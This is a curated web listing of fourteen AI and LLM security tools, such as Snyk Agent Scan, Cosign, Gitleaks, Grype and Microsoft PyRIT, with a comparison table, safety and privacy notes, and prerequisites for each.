Skip to main content
hc
Submit
AI security · tools · 14 picks

Best AI & LLM security tools

Security tooling for AI and LLM applications — vulnerability scanning, guardrails, red-teaming, and supply-chain checks.

Curated by @heyclaude-editors Updated 2026-06-19

Security tooling for AI and LLM applications — vulnerability scanning, guardrails, red-teaming, and supply-chain checks.

Compared at a glance

The top 5 picks side by side on trust, install, platform support, and disclosed notes — full rationale for each below.

FieldSnyk Agent Scan

Security scanner from Snyk for discovering local AI agent components, including MCP servers and Agent Skills, and checking them for prompt injection, tool poisoning, tool shadowing, toxic flows, malware payloads, credential handling, and hardcoded secrets.

Open dossier 		Protect AI

AI security platform for securing machine learning and LLM supply chains, models, applications, and infrastructure.

Open dossier 		Cosign

Apache-2.0 Sigstore CLI for signing, verifying, and attesting containers, blobs, binaries, SBOMs, and OCI artifacts with keyless OIDC, KMS keys, Fulcio, Rekor, bundles, and registry storage.

Open dossier 		Gitleaks

Open-source secret scanner for finding passwords, API keys, tokens, and other credentials in git history, files, directories, and stdin.

Open dossier 		Grype

Apache-2.0 vulnerability scanner from Anchore for container images, filesystems, archives, SBOMs, PURLs, and CPEs, with risk scoring, VEX filtering, and CI-friendly output.

Open dossier
Trust
Install riskReview firstReview firstReview firstReview firstReview first
Notes Safety Privacy Safety · Privacy · Safety Privacy Safety Privacy Safety Privacy
Categorytoolstoolstoolstoolstools
Sourcesource-backedsource-backedsource-backedsource-backedsource-backed
AuthorSnykProtect AISigstoreGitleaksAnchore
Added2026-06-182026-04-272026-06-042026-06-032026-06-04
Platforms
CLI
CLI
CLI
CLI
CLI
Source repo
Safety notesScanning MCP configuration files can execute the commands declared for stdio MCP servers so Agent Scan can retrieve tool descriptions. Interactive scans ask for consent before starting each stdio MCP server; review the command and arguments before approving. Use `--dangerously-run-mcp-servers` only in trusted environments after verifying every MCP server command. CLI output is marked experimental upstream, so avoid building brittle production parsers around issue codes or output fields without Snyk guidance. Sandbox untrusted third-party MCP configs, skills, plugins, or agent workspaces before scanning.— missingSign container images by immutable digest rather than mutable tag so the signature is attached to the intended artifact. Keyless workflows depend on OIDC issuer and subject claims; overly broad certificate identity, issuer, or regular-expression verification can approve artifacts from the wrong workflow or account. Public-key, KMS, Vault, Kubernetes secret, environment-variable, and hardware-backed signing flows can expose high-value signing material if CI permissions or logs are too broad. Disabling Cosign claim checks or bypassing transparency-log and timestamp expectations weakens the connection between the verified signature and the artifact being consumed. Attestation and policy workflows can gate releases, deploys, or promotion decisions; review predicate schemas, policy rules, and failure behavior before enforcing them in production. Cosign can upload signatures, certificates, attestations, and bundles to registries or transparency infrastructure; test registry support and cleanup behavior before relying on it. Registry cleanup or deletion commands can remove signatures where the registry supports deletion, so keep release evidence retention and recovery requirements explicit. Offline and air-gapped verification requires current trusted roots, bundles or signed-entry evidence, local artifacts, and a process for refreshing trust data safely.Gitleaks can scan git history and large directories, so scope scans intentionally and use baselines for noisy legacy repositories. Findings may include real active credentials; treat reports, CI logs, and exported SARIF or JSON artifacts as sensitive. The upstream README states Gitleaks is feature complete and future releases are expected to be security patches only.Grype parses container images, archives, filesystems, SBOMs, package identifiers, and vulnerability data; run it from trusted automation with bounded filesystem access and resource limits for untrusted targets. The install script and binary update paths should be verified before use in production CI; pin versions and checksums where reproducible builds or regulated environments require it. Scanning private images can use registry credentials, client certificates, tokens, Docker or Podman daemon access, and local image metadata, so CI jobs should scope credentials and avoid broad registry permissions. Vulnerability findings are advisory and depend on package detection, vulnerability database freshness, distro context, CPE matching, fix-state metadata, EPSS, KEV, and risk-scoring inputs; high-impact findings still need human triage. Fail-on thresholds, only-fixed filters, only-notfixed filters, ignore rules, VEX documents, and suppressed-result settings can change pipeline outcomes, so policy changes should be reviewed like security code. The configuration reference includes options for insecure registry TLS behavior and HTTP registry access; these should be avoided outside tightly controlled test environments. Automatic database updates and application update checks make outbound network requests unless disabled or pinned by policy. Large images, archives, monorepos, or SBOMs can produce expensive scans and large JSON/SARIF artifacts; set timeouts, artifact limits, cache policy, and retention rules in CI.
Privacy notesAgent Scan can discover local agent configuration paths, MCP server names, commands, arguments, tool names, descriptions, prompts, resources, skill text, and local component inventories. The README states skills, agent applications, tool names, and descriptions are shared with Snyk for validation. Control-server bootstrap can send redacted CLI args, OS and Python details, hostname, username, shell, locale, timezone, working directory, home directory, executable path, and readable home-directory metadata when enabled. Review Snyk Agent Scan terms, enterprise deployment guidance, and organization policy before scanning customer data, proprietary skills, or sensitive agent configurations.— missingKeyless signing can publish email addresses, OIDC identities, certificate metadata, timestamps, and transparency-log records that are intentionally public and may be permanent. Registry-stored signatures, certificates, attestations, OCI referrers, annotations, and bundles can reveal image names, digests, artifact relationships, workflow identity, and release metadata. Sigstore bundles can include signatures, certificates, timestamps, transparency-log inclusion proofs, and issuer or subject details that should be reviewed before publishing. CI logs and artifacts can expose image references, registry hosts, certificate identities, issuer URLs, workflow paths, annotations, KMS URIs, bundle paths, and verification payloads. Cloud KMS, Vault, registry, GitHub Actions, GitLab CI, and other identity providers may receive authentication, authorization, and audit metadata when Cosign signs or verifies artifacts. Private keys, KMS credentials, registry tokens, client certificates, OIDC tokens, and signing environment variables should be scoped, rotated, masked, and excluded from generated artifacts.Scans inspect repository contents, file contents, commit metadata, and streamed input for credential-like strings. Report files and verbose logs can contain secret values unless redaction and artifact retention are configured carefully. CI integrations may expose findings to workflow logs, code-scanning systems, or third-party build infrastructure.The Grype getting-started docs say Grype runs locally and does not send scan data to external services; it needs internet access for downloading container images and the vulnerability database. Pulling images from remote or private registries can disclose image names, tags, digests, registry hostnames, platform requests, authentication attempts, and network metadata to registry infrastructure. Scan output can reveal package names, package versions, ecosystems, distro names, image identifiers, file metadata, file digests, executable metadata, vulnerability identifiers, fix versions, EPSS, KEV, risk scores, and suppressed findings. JSON, SARIF, CycloneDX, and template outputs are useful for automation but can leak dependency inventory and security posture when uploaded to CI logs, code scanning tools, tickets, dashboards, or long-retention artifacts. Configuration files and environment variables can include registry usernames, passwords, tokens, client certificates, client keys, CA certificates, cache paths, update URLs, ignore rules, VEX documents, and output paths. SBOM inputs may contain full dependency inventories and build metadata; treat Grype reports and source SBOMs as security-sensitive artifacts.
Prerequisites
  • Python 3.10 or newer, through uv/uvx or another supported Python package execution path.
  • A Snyk account and `SNYK_TOKEN` environment variable for scan verification.
  • Permission to inspect the local user's AI agent configuration files, MCP server configs, and Agent Skill directories.
  • A sandbox, VM, container, or disposable environment when scanning untrusted MCP configs.
— none listed
  • Cosign installed from an official or trusted path such as GitHub releases, Homebrew, Go install, a Linux package, the official container image, or a CI installer action.
  • Artifact target plan for container images by digest, local blobs, binaries, SBOMs, WASM modules, Tekton bundles, OCI artifacts, or release files.
  • Signing identity or key plan covering keyless OIDC, expected certificate identity and issuer, self-managed keys, hardware keys, KMS, Vault, Kubernetes secrets, PKCS11, or custom PKI.
  • Registry and artifact-storage plan for OCI referrers, signature artifacts, private registry authentication, local bundles, offline verification, and later upload workflows.
  • A repository, directory, file, or stdin stream that you are authorized to scan.
  • Gitleaks installed through Homebrew, Docker, Go, a release binary, pre-commit, or the official GitHub Action.
  • A plan for handling findings, baselines, and allowed test credentials without exposing real secrets in reports.
  • Grype installed from an official or trusted package path such as the Anchore install script, Homebrew, Windows package manager, Docker image, or GitHub release.
  • Target selection for container images, registries, Docker, Podman, containerd, OCI archives, Docker archives, Singularity images, directories, files, SBOMs, Package URLs, or CPEs.
  • Vulnerability database update policy, cache directory, offline scanning expectations, database age policy, and network allowance for database downloads.
  • CI policy for output formats, JSON/SARIF artifacts, fail-on severity thresholds, fix-state filters, VEX documents, ignore rules, and suppressed-result review.
Install
uvx snyk-agent-scan@latest
Config
Citations
ClaimUnclaimedUnclaimedUnclaimedUnclaimedUnclaimed
  1. 01
    tools

    Snyk Agent Scan

    Scan Claude, Cursor, Codex, Gemini, Windsurf, VS Code, and other local agent configs for MCP and skill supply-chain risks.

    Review firstSource-backedReview firstAdded 21h ago
    Safety Privacy
    Why it made the cut

    Snyk Agent Scan is included because it has safety notes present, privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  2. 02
    tools

    Protect AI

    AI security platform for models and applications.

    Review firstSource-backedReview firstAdded 2mo ago
    Safety · Privacy ·
    Why it made the cut

    Protect AI is included because it has source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  3. 03
    tools

    Cosign

    Sign, verify, and attest containers, binaries, SBOMs, and OCI artifacts.

    Review firstSource-backedReview firstAdded 15d ago
    Safety Privacy
    Why it made the cut

    Cosign is included because it has safety notes present, privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  4. 04
    tools

    Gitleaks

    Open-source secret scanner for repositories and files.

    Review firstSource-backedReview firstAdded 16d ago
    Safety Privacy
    Why it made the cut

    Gitleaks is included because it has safety notes present, privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  5. 05
    tools

    Grype

    Scan images, directories, SBOMs, PURLs, and CPEs for known vulnerabilities.

    Review firstSource-backedReview firstAdded 15d ago
    Safety Privacy
    Why it made the cut

    Grype is included because it has safety notes present, privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  6. 06
    tools

    Kubescape

    Scan Kubernetes clusters, manifests, charts, repositories, and images for security risk.

    Review firstSource-backedReview firstAdded 15d ago
    Safety Privacy
    Why it made the cut

    Kubescape is included because it has safety notes present, privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  7. 07
    tools

    OpenSandbox

    Sandbox runtime for AI agents with multi-language SDKs, MCP tools, Docker, Kubernetes, egress controls, credential vault, and code execution.

    Review firstSource-backedReview firstAdded 21h ago
    Safety Privacy
    Why it made the cut

    OpenSandbox is included because it has safety notes present, privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  8. 08
    tools

    Semgrep

    Static analysis, SAST, secrets, dependency checks, and custom code rules.

    Review firstSource-backedReview firstAdded 16d ago
    Safety Privacy
    Why it made the cut

    Semgrep is included because it has safety notes present, privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  9. 09
    tools

    Syft

    Generate SBOMs from images, directories, files, archives, and OCI layouts.

    Review firstSource-backedReview firstAdded 15d ago
    Safety Privacy
    Why it made the cut

    Syft is included because it has safety notes present, privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  10. 10
    tools

    Lakera Guard

    AI security guardrails for LLM applications.

    Review firstSource-backedReview firstAdded 2mo ago
    Safety · Privacy
    Why it made the cut

    Lakera Guard is included because it has privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  11. 11
    tools

    Promptfoo

    Open-source prompt testing and red-teaming framework.

    Review firstSource-backedReview firstAdded 2mo ago
    Safety · Privacy
    Why it made the cut

    Promptfoo is included because it has privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  12. 12
    tools

    Garak

    Open-source LLM vulnerability scanner.

    Review firstSource-backedReview firstAdded 2mo ago
    Safety · Privacy ·
    Why it made the cut

    Garak is included because it has source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  13. 13
    tools

    Microsoft PyRIT

    Microsoft framework for generative AI risk identification and red-team assessment.

    Review firstSource-backedReview firstAdded 16d ago
    Safety Privacy
    Why it made the cut

    Microsoft PyRIT is included because it has safety notes present, privacy notes present, source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

  14. 14
    tools

    Giskard

    AI testing platform for LLM and ML quality.

    Review firstSource-backedReview firstAdded 2mo ago
    Safety · Privacy ·
    Why it made the cut

    Giskard is included because it has source-backed source posture.

    Reach for instead

    If this will touch credentials, local files, or production systems, inspect the upstream source first.

Missing a pick? Propose an edit to this list — every change goes through the same review queue as new entries.

Suggest a pick
Weekly · Sundays

Get the weekly brief

One calm read on Claude workflows. Sundays. No tracking pixels.

Unsubscribe any time. No tracking pixels. No partner blasts.